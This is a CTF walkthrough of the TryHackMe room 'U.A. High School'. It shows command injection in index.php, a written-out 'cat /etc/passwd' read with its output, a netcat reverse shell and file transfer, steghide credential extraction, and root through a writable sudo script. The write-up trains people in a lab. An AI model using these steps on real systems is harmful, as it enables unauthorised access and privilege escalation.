U.A. High School TryHackMe Walkthrough | Writeup | Beginner Friendly | THM | — SuNnY

Sunny Singh Verma
6 min read · Aug 24, 2024


Theme Pic of TryHackMe Room : U.A. High School

INTRODUCTION

The “U.A. High School” room on TryHackMe is inspired by the popular anime “My Hero Academia”. It is themed around the fictional U.A. High School, where students train to become heroes, and combines the usual beginner tasks: network scanning, enumeration, exploiting a vulnerability and finding hidden flags inside a small simulated network.

The room is designed to be engaging for fans of the series, referencing elements from the show while exercising the practical skills that aspiring ethical hackers and red teamers need.

ROOM OBJECTIVES -

Finding the User and Root Flags
( Recon > Enum > Gaining Foothold > user.txt || Privilege Escalation > root.txt )

DIFFICULTY

Easy Room [ Linux based operating system ]
In my personal opinion this room should be rated Medium,
because of the image header repair and the base64-encoded command output (base64 is an encoding, not encryption, so it hides nothing once you spot it).
Just a personal heads-up

** ( This Writeup | Walkthrough is Beginner Friendly ) **

KUDOS TO THE CREATORS

Special Thanks to the Creators of this room

LET’S START THE PARTY !

Firing up the Machine →

Let’s begin by adding the target’s IP address to the hosts file
and giving it a hostname: school.thm

 echo "IP-ADDRESS-OF-YOUR-MACHINE school.thm" | sudo tee -a /etc/hosts

Other way:

sudo nano /etc/hosts

IP-ADDRESS school.thm
( Control + X, then Y, to save the file )
Don’t forget to put your machine’s IP address in place of
“IP-ADDRESS-OF-YOUR-MACHINE”

Let’s Start { Refer to Cyber Kill Chain }

Reconnaissance

Nmap scan to find open ports

Found 2 open ports: port 80 (HTTP) and port 22 (SSH)

Directory Enumeration Using GoBuster

gobuster dir -w /home/kali/Seclist/raft-medium-words.txt -u http://school.thm -s 200,301 -b "" 

With the -s flag we only show results whose status code is 200 or 301, which keeps the output short. Gobuster refuses to combine -s with its default status-code blacklist (404), so -b "" clears that blacklist. You may skip the filter and run the plain scan instead.

GoBuster Directory Enumeration Screenshot

We found a directory → /assets

Requesting /assets on its own returns a 404, so the interesting files must sit inside it.

Let’s enumerate the sub-directory → /assets

PHP? Possible command injection?

Enumeration inside /assets reveals PHP, which points us back to index.php. A PHP page that runs something with user-supplied input is a classic command-injection candidate.

PS — I Love cats 🤫

AARGH Sorry Sorry … wrong MEME ! yikes 🤣🤣

PHP > Command Injection? Now the right one -

Submitting the ls command through the input on the main index.php page returns a base64 string.

Decoding the base64 gives → images, index.php and styles.css

So index.php is confirmed, and every command result comes back base64-encoded. Déjà vu activated!!

Command injection check ✅

Let’s try cat /etc/passwd .. yeah, cat!

Base64 again; decode it the same way.

Base64 found →

cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTE6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExMjo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExMzo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmxhbmRzY2FwZTp4OjEwOToxMTU6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpwb2xs
aW5hdGU6eDoxMTA6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpmd3VwZC1yZWZyZXNoOng6MTExOjExNjpmd3VwZC1yZWZyZXNoIHVzZXIsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnVzYm11eDp4OjExMjo0Njp1c2JtdXggZGFlbW9uLCwsOi92YXIvbGliL3VzYm11eDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTEzOjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC1jb3JlZHVtcDp4Ojk5OTo5OTk6c3lzdGVtZCBDb3JlIER1bXBlcjovOi91c3Ivc2Jpbi9ub2xvZ2luCmRla3U6eDoxMDAwOjEwMDA6ZGVrdTovaG9tZS9kZWt1Oi9iaW4vYmFzaAoKbHhkOng6OTk4OjEwMDo6L3Zhci9zbmFwL2x4ZC9jb21tb24vbHhkOi9iaW4vZmFsc2UK
echo "base64-above" | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash <<------

deku, UID 1000 / GID 1000, with a /bin/bash login shell → well hello there! We know our user now
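Because every response from the injection point comes back base64-encoded, it is worth scripting the decode-and-triage step instead of pasting blobs into base64 -d by hand. The script below is an added example written for this walkthrough, not code from the room or from its author. It embeds a constructed base64 response (a subset of the passwd lines shown above) and picks out the accounts that have a real login shell, which is exactly how deku stands out from the service accounts.

```python
import base64

# Shells that never give an interactive login; anything else is a candidate for SSH.
NON_INTERACTIVE_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed sample: a base64-encoded subset of the /etc/passwd output shown above,
# in the form the injection point returns it (the real response is the long string
# in the writeup; this one is built here so the script runs offline).
SAMPLE_RESPONSE = base64.b64encode(
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    b"sync:x:4:65534:sync:/bin:/bin/sync\n"
    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    b"deku:x:1000:1000:deku:/home/deku:/bin/bash\n"
    b"\n"
    b"lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\n"
).decode()


def decode_response(b64_text: str) -> str:
    """Decode the base64 the injection point wraps around command output.

    Whitespace (including the line wrap the writeup shows) is stripped first,
    and missing '=' padding is restored so a copy-pasted string still decodes.
    """
    compact = "".join(b64_text.split())
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-8", errors="replace")


def parse_passwd(text: str) -> list[dict]:
    """Turn passwd lines into dicts; blank or malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return users


def interactive_users(text: str) -> list[str]:
    """Accounts whose shell can actually run commands: the ones credentials are useful for."""
    return [u["name"] for u in parse_passwd(text) if u["shell"] not in NON_INTERACTIVE_SHELLS]


def human_users(text: str, min_uid: int = 1000) -> list[str]:
    """Non-system accounts: UID >= 1000 on Debian/Ubuntu, excluding nobody (65534)."""
    return [u["name"] for u in parse_passwd(text) if min_uid <= u["uid"] < 65534]


if __name__ == "__main__":
    passwd = decode_response(SAMPLE_RESPONSE)
    print("interactive:", interactive_users(passwd))  # ['root', 'deku']
    print("human users:", human_users(passwd))        # ['deku']
```

Replace SAMPLE_RESPONSE with the string copied from your own response to triage a real target. The padding repair matters in practice: browsers and terminals often drop the trailing "=" characters when you copy a long base64 blob, and base64 -d then fails with an "invalid input" error.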

Now let’s get a shell and work towards the user

Using the command injection, let’s get a reverse connection with netcat

First, set up a netcat listener on port 1337

We leet!

Getting a reverse shell with PHP exec

Generate the PHP exec payload at revshells.com and don’t forget to URL-encode it before sending it through the injection point

Got the reverse shell!!

Voila! We have a www-data shell via the PHP exec payload

We found 2 files. Let’s transfer them from the victim’s machine to the attacker’s system using netcat.

Got oneforall.jpg onto the attacker machine. On inspection, the file command reports it as plain “data” rather than JPEG image data, even though the file carries a .jpg extension.

That means either the image data is corrupted or the file’s header (its magic bytes) has been altered. It has to be the latter, so let’s look at the first bytes of the file, compare them with the header of a valid JPEG, and fix the discrepancy.

The part where we fix the incorrect JPEG header

Open the file in hexedit. If hexedit is not installed on your Linux (Kali/Parrot):

sudo apt install hexedit -y

hexedit oneforall.jpg

We need to change the initial bytes of the file

Every byte that differs from the expected header has to be corrected, not just the first one

After changing the header of the file we get this →

The correct raw JPEG header is easy to find: every JPEG starts with FF D8 FF, and a plain JFIF file continues with E0 00 10 4A 46 49 46 00 (the APP0 marker, its length, and the bytes of “JFIF”)
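The repair the walkthrough does by hand in hexedit can also be done with a few lines of Python, which has the advantage of reporting exactly which offsets were tampered with before anything is written. This is an added example, not the room’s file or the author’s code. It assumes the original image was a plain JFIF file (header FF D8 FF E0 00 10 “JFIF” 00 01 01); a JPEG carrying Exif metadata begins FF D8 FF E1 instead, so if the file command still refuses the output, pass the matching header. The damaged sample bytes are constructed here and are not taken from oneforall.jpg.

```python
SOI = b"\xff\xd8"  # Start Of Image: the first two bytes of every JPEG
EOI = b"\xff\xd9"  # End Of Image: the last two bytes of every JPEG
# Plain JFIF header: SOI, APP0 marker (FF E0), segment length 0x0010,
# the identifier "JFIF\0" and JFIF version 1.01.
JFIF_HEADER = bytes.fromhex("ff d8 ff e0 00 10 4a 46 49 46 00 01 01")

# Constructed sample (not the room's oneforall.jpg): the JFIF header, the rest of
# the APP0 segment (density unit, X/Y density, thumbnail size), a stub body and EOI.
VALID_SAMPLE = JFIF_HEADER + bytes.fromhex("00 0001 0001 00 00") + b"\xff\xdb\x00\x04" + EOI
# The same file with its first 10 bytes zeroed, which is what a tampered magic
# number looks like: `file` says "data" instead of "JPEG image data".
CORRUPT_SAMPLE = b"\x00" * 10 + VALID_SAMPLE[10:]


def is_jpeg(data: bytes) -> bool:
    """True when the data starts with SOI followed by a marker and ends with EOI."""
    return data.startswith(SOI + b"\xff") and data.endswith(EOI)


def diff_header(data: bytes, header: bytes = JFIF_HEADER) -> list[tuple[int, int, int]]:
    """(offset, found, expected) for every byte in the header region that is wrong."""
    return [
        (i, data[i], header[i])
        for i in range(min(len(header), len(data)))
        if data[i] != header[i]
    ]


def fix_jpeg_header(data: bytes, header: bytes = JFIF_HEADER) -> bytes:
    """Overwrite the leading bytes with the expected header; the payload is untouched."""
    if len(data) < len(header):
        raise ValueError("file too short to be a JPEG")
    return header + data[len(header):]


def repair_file(path_in: str, path_out: str, header: bytes = JFIF_HEADER) -> list[tuple[int, int, int]]:
    """Read a damaged file, write the repaired copy, and return what was changed."""
    with open(path_in, "rb") as f:
        data = f.read()
    changes = diff_header(data, header)
    with open(path_out, "wb") as f:
        f.write(fix_jpeg_header(data, header))
    return changes


if __name__ == "__main__":
    print("corrupt sample recognised as JPEG:", is_jpeg(CORRUPT_SAMPLE))
    print("tampered offsets:", [off for off, _, _ in diff_header(CORRUPT_SAMPLE)])
    print("repaired == original:", fix_jpeg_header(CORRUPT_SAMPLE) == VALID_SAMPLE)
    # On the real target: repair_file("oneforall.jpg", "oneforall_fixed.jpg")
```

After repair_file runs, confirm the result with the file command and only then move on to steghide; if the image still does not open, compare diff_header’s report against a known-good JPEG from the same source, because a tampered file may have had more than the leading bytes altered.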

Now that the file is a valid JPEG we can check it for hidden content with steganography tools

Using steghide to extract the file embedded inside the image

steghide needs a passphrase to extract the contents

After a lot of exploring, a Hidden_Content directory was discovered in the output of ls -la
pwd = /var/www/Hidden_Content

Inside it we find the passphrase for the jpg file →

Another base64 string; now you know what to do

Let’s try this passphrase with the jpg file we just fixed

We got creds.txt

We now have the creds for deku, our user!!

Let’s log in with the creds we extracted from the jpg file →

ssh deku@school.thm 

Enter the password :

We found our User Flag

Privilege Escalation

First things first

sudo -l

sudo -l ( lowercase L ) lists what deku is allowed to run with sudo: feedback.sh

Let’s check the contents of feedback.sh first

By changing into its directory and launching feedback.sh with sudo, we add user deku to the sudoers file

Let’s check again with sudo -l

Voila! deku now has NOPASSWD: ALL

Now launch /bin/bash through sudo to get a root shell and read the root flag

We have pwned the U.A. High School room

Hope you liked this TryHackMe walkthrough.

Let’s connect on LinkedIn → https://linkedin.com/in/sunnysinghverma

If you did, you can add a clap to this article to let me know.
You can also follow me on Medium to get more articles about CTFs and cybersecurity in the near future.

Thank you !
SuNnY

Sunny Singh Verma

Blogger & Cyber Security Enthusiast || TryHackMe Wall of Fame - in Top 50 Ethical Hackers Worldwide || HTB-Elite Hacker || Follow for Cyber World & CTF updates!